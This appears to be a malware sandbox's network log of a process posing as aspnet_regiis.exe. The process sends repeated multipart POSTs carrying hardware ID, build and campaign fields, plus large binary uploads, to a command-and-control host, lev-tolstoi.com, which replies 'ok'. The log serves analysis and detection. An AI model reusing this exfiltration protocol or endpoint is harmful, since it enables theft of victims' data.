T7SQde4ufF2OmvwuFVVWKAsoOdnGb3BudPjKxO6T6VVLZJBUHs+MHM8KrH5xATJo2nzM7WXugNqFXKvgjgM9MA+wpBDOXyhZK7jtPiEwwzsq3DlJxIrhTnV871Vq4/2Qb7TwtE5enExv+kxOscHyeVuMXL3FjuAqtCzLAO4nKbTPFSTxSi29LKu7aH9lUcLsfyg8rRRewCp1HBsQXpNNMN9U8MSeTrxcbxrsHlGxYkg6zFhZIX5xXnCIKHA+A71
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 49 52 4f 33 75 78 63 57 37 35 34 6e 6f 44 56 74 36 78 34 72 49 30 2f 31 5a 36 78 2f 6e 54 34 79 73 54 75 6b 2b 6c 56 53 32 52 41 5a 4e 36 75 54 4a 77 76 2b 37 79 65 51 63 46 43 4f 49 71 73 44 45 31 6c 2f 79 43 36 64 62 79 72 49 47 36 6a 7a 48 44 66 6b 4b 51 51 7a 6c 38 6f 57 53 75 35 6a 66 36 42 49 55 59 4b 36 74 32 4d 54 57 56 4f 73 42 35 30 2b 4d 72 45 37 70 50 70 56 55 74 6b 63 44 51 65 62 34 79 63 72 37 6f 4d 37 6c 42 78 51 74 69 71 6e 44 77 4d 35 57 38 67 4b 73 56 63 47 78 41 65 45 2b 33 51 61 32 42 45 39 4c 2b 71 71 64 69 74 65 71 32 4f 56 58 50 44 69 52 72 63 2f 55 31 31 72 73 54 62 67 65 32 2f 55 4a 34 6e 4b 4e 54 50 5a 4c 41 6c 37 6e 36 38 2f 41 39 71 48 47 36 68 41 55 4a 6f 4f 68 7a 64 66 53 57 4f 41 4c 72 46 48 48 74 67 58 6b 50 4e 77 65 74 67 Data Ascii: IRO3uxcW754noDVt6x4rI0/1Z6x/nT4ysTuk+lVS2RAZN6uTJwv+7yeQcFCOIqsDE1l/yC6dbyrIG6jzHDfkKQQzl8oWSu5jf6BIUYK6t2MTWVOsB50+MrE7pPpVUtkcDQeb4ycr7oM7lBxQtiqnDwM5W8gKsVcGxAeE+3Qa2BE9L+qqditeq2OVXPDiRrc/U11rsTbge2/UJ4nKNTPZLAl7n68/A9qHG6hAUJoOhzdfSWOALrFHHtgXkPNwetg
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 36 63 44 50 38 61 58 46 37 68 30 53 4b 49 4b 76 78 63 2f 66 57 65 38 4d 71 31 54 4c 75 77 65 75 66 4a 55 4c 37 67 70 58 44 4e 54 36 77 74 4c 32 75 59 76 64 46 67 6f 7a 6b 71 66 54 77 35 35 34 34 77 47 6b 56 63 57 6c 54 76 46 38 7a 45 7a 78 52 6b 38 55 6f 75 72 42 78 76 69 75 78 2b 41 59 46 43 57 4d 70 63 6e 4c 7a 6c 6a 6c 42 61 74 59 7a 36 63 45 35 43 44 63 42 66 74 45 42 31 37 68 71 6f 75 4b 2f 4c 47 4a 74 31 55 70 4b 49 53 6d 31 63 6a 54 46 2f 39 44 76 68 44 46 75 55 36 32 63 73 63 65 39 6b 45 50 53 2b 7a 34 78 4d 4c 30 6f 38 6e 70 48 68 45 68 6a 71 37 4e 7a 4e 70 57 37 51 79 6d 55 4d 65 31 42 2f 77 2f 6c 55 4b 32 54 52 63 4d 75 71 72 79 78 76 43 59 79 76 6c 56 42 47 79 65 36 73 54 4a 6e 41 2b 67 44 4c 56 64 79 72 45 4f 34 7a 54 65 44 66 64 4a 44 30 7a Data Ascii: 6cDP8aXF7h0SKIKvxc/fWe8Mq1TLuweufJUL7gpXDNT6wtL2uYvdFgozkqfTw5544wGkVcWlTvF8zEzxRk8UourBxviux+AYFCWMpcnLzljlBatYz6cE5CDcBftEB17hqouK/LGJt1UpKISm1cjTF/9DvhDFuU62csce9kEPS+z4xML0o8npHhEhjq7NzNpW7QymUMe1B/w/lUK2TRcMuqryxvCYyvlVBGye6sTJnA+gDLVdyrEO4zTeDfdJD0z
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 72 76 75 79 76 30 48 48 53 47 52 71 59 54 37 34 6e 66 72 47 36 5a 64 79 62 6b 77 30 43 66 57 41 76 68 4e 47 56 32 69 70 49 58 46 75 2f 48 77 72 31 31 62 48 63 6e 71 32 34 57 45 46 39 55 4f 71 56 37 46 6f 78 2b 6a 45 74 34 61 39 30 63 45 51 4b 44 72 79 4e 72 38 36 59 65 76 45 31 74 36 31 2b 53 44 77 63 30 58 75 46 33 31 43 35 66 6d 57 62 35 67 79 6b 4c 76 43 68 6b 4d 75 72 69 4c 69 75 6e 70 6b 61 39 53 47 44 43 56 72 4d 44 54 33 78 44 65 4d 34 64 62 7a 72 59 43 37 7a 57 56 51 72 5a 46 54 78 54 62 71 73 62 59 36 65 62 59 2b 52 67 4c 4a 63 75 69 30 73 6a 51 46 36 35 4e 36 31 54 4a 75 51 76 70 49 70 6f 65 35 6b 45 44 57 71 37 75 31 34 71 31 36 64 6a 6b 47 67 6b 73 67 4f 58 53 30 39 46 48 34 77 69 67 48 4d 71 6b 41 2b 4a 79 6d 30 7a 6a 51 51 4e 4b 37 2f 2b 4b Data Ascii: rvuyv0HHSGRqYT74nfrG6Zdybkw0CfWAvhNGV2ipIXFu/Hwr11bHcnq24WEF9UOqV7Fox+jEt4a90cEQKDryNr86YevE1t61+SDwc0XuF31C5fmWb5gykLvChkMuriLiunpka9SGDCVrMDT3xDeM4dbzrYC7zWVQrZFTxTbqsbY6ebY+RgLJcui0sjQF65N61TJuQvpIpoe5kEDWq7u14q16djkGgksgOXS09FH4wigHMqkA+Jym0zjQQNK7/+K
2024-12-18 13:46:53 UTC	1369	IN	Data Raw: 58 2b 42 68 55 70 6b 61 32 44 2b 70 49 58 2b 45 33 2f 45 50 65 32 41 4f 41 31 77 78 32 37 62 41 78 4c 35 4f 6e 4c 33 65 72 70 68 36 38 54 57 33 72 56 35 49 50 42 7a 52 65 34 58 66 55 4c 6c 2b 5a 5a 76 6d 44 4b 51 75 38 4b 47 51 79 36 75 59 75 4b 36 65 6d 52 72 31 49 56 4c 34 61 70 7a 63 62 4f 52 65 59 4f 73 56 4f 46 69 7a 44 4c 50 39 67 4a 2b 45 30 78 63 73 50 67 31 63 66 30 72 76 66 52 49 67 6f 6c 6c 2b 6a 6c 78 73 70 55 6f 45 50 6e 53 49 4c 74 54 73 38 34 78 51 48 35 54 55 38 43 6f 75 36 46 6b 72 75 4d 78 4f 49 51 46 53 58 46 69 38 6e 56 30 56 6a 6e 54 65 6b 51 7a 76 56 57 72 6a 50 66 48 50 74 46 43 41 44 6c 38 4d 4b 4b 74 65 6e 48 72 30 31 62 49 34 32 36 7a 73 72 62 47 2b 59 44 71 52 44 64 2b 78 65 75 4a 4a 56 55 70 51 52 50 58 71 4b 79 68 59 33 31 70 Data Ascii: X+BhUpka2D+pIX+E3/EPe2AOA1wx27bAxL5OnL3erph68TW3rV5IPBzRe4XfULl+ZZvmDKQu8KGQy6uYuK6emRr1IVL4apzcbOReYOsVOFizDLP9gJ+E0xcsPg1cf0rvfRIgoll+jlxspUoEPnSILtTs84xQH5TU8Cou6FkruMxOIQFSXFi8nV0VjnTekQzvVWrjPfHPtFCADl8MKKtenHr01bI426zsrbG+YDqRDd+xeuJJVUpQRPXqKyhY31p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:46:54 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18170 Host: lev-tolstoi.com
2024-12-18 13:46:54 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
2024-12-18 13:46:54 UTC	2839	OUT	Data Raw: 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 Data Ascii: yA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'
2024-12-18 13:46:59 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:46:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ma64n2hnmaqbnue64ju83scesf; expires=Sun, 13-Apr-2025 07:33:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wzsM8t4cOd1d%2BFwNEPb18k7ld2dpubbyYhN49h%2BCzkMsZAy12LefFGHv7orzBfpvqmvyzC0FBWZrTORDISt64k9Ah%2Bqnm59%2BIfD1bTGxB6yI96Jd8UUlqlyY006jf5esB5s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f9a0e6dbd1780-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1541&rtt_var=580&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2834&recv_bytes=19131&delivery_rate=1882656&cwnd=171&unsent_bytes=0&cid=99fcf4e35a0f201d&ts=4072&x=0"
2024-12-18 13:46:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 13:46:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:47:00 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8791 Host: lev-tolstoi.com
2024-12-18 13:47:00 UTC	8791	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
2024-12-18 13:47:03 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:47:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q6bpqkhtntrc1dlv523f8utd6c; expires=Sun, 13-Apr-2025 07:33:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2FnTPr7EYk2hm1R80JKsh69PoChRGVjQ4QUAED8UmBg5Ce7tLkotqW9hk7FS9Ojfyr0a%2B4wuo2zRKFFchbj%2B6IEmqsn%2Fw7%2F7K6eM9eaTrvKV2ICGONvlbHXzR0Hw5yGHER4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f9a3118cf43c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1705&rtt_var=650&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2835&recv_bytes=9729&delivery_rate=1669525&cwnd=222&unsent_bytes=0&cid=29c7cc5979b2343e&ts=2966&x=0"
2024-12-18 13:47:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 13:47:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:47:05 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20444 Host: lev-tolstoi.com
2024-12-18 13:47:05 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
2024-12-18 13:47:05 UTC	5113	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 Data Ascii: `M?lrQMn 64F6(X&7~
2024-12-18 13:47:08 UTC	1044	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:47:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mha610i7lit03jdaprvgdvfhq6; expires=Sun, 13-Apr-2025 07:33:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S1lt%2BiqE2r0bkTGhxHpvOXtW%2FliEB1nCNL0bULY%2FYV%2BTgzOWsv2lC2nJzdOdUUPWdaenHM68iTA2UyQdogF5vjbJK6iI%2F1sf8od8i0cJft5WI3H0OlF0M2oZc%2BQPXgXmuSw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f9a4dddec4263-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1902&rtt_var=951&sent=14&recv=25&lost=0&retrans=1&sent_bytes=4210&recv_bytes=21405&delivery_rate=165523&cwnd=247&unsent_bytes=0&cid=37a3af0bb10dbd96&ts=3263&x=0"
2024-12-18 13:47:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 13:47:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:47:10 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1285 Host: lev-tolstoi.com
2024-12-18 13:47:10 UTC	1285	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
2024-12-18 13:47:11 UTC	1031	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 13:47:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vuek0t39jiq59nnf2q1c30p92j; expires=Sun, 13-Apr-2025 07:33:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2F8u3DxEV4F89RoTgUxG7Ob7eHFfEwKM2hO0lDMbAr1tjLBKPTF4o8RLT8ddF5OSuusLL9U7BhSCXWkpex0O9M7FuQIRCmaL4ZCFCyVqoif6YonjclAv9sHP84EhjPhtgXk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f9a6f0c26430e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1607&rtt_var=611&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2201&delivery_rate=1778319&cwnd=186&unsent_bytes=0&cid=c9dcc8cfac7cf2ec&ts=937&x=0"
2024-12-18 13:47:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 13:47:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	172.67.157.254	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 13:47:13 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 588389 Host: lev-tolstoi.com
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: c7 60 24 d7 fc e7 bd e0 8e 2a 1d 35 a9 c3 40 7d 98 6b 1b f4 48 62 0c 70 5b 2a 37 da aa e6 b6 9a ff 60 ae c7 21 9b fb fe 0d 79 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f Data Ascii: `$5@}kHbp[7`!yivhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i5.=4-?
2024-12-18 13:47:13 UTC	15331	OUT	Data Raw: 36 c2 83 4b cb 35 df e3 ad 65 4b 2c 77 5c 96 0b 7a f0 2c de 8c cd 42 d2 23 c5 b6 e9 d6 31 d4 77 de ec 38 aa 2d d8 31 17 10 d5 f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 Data Ascii: 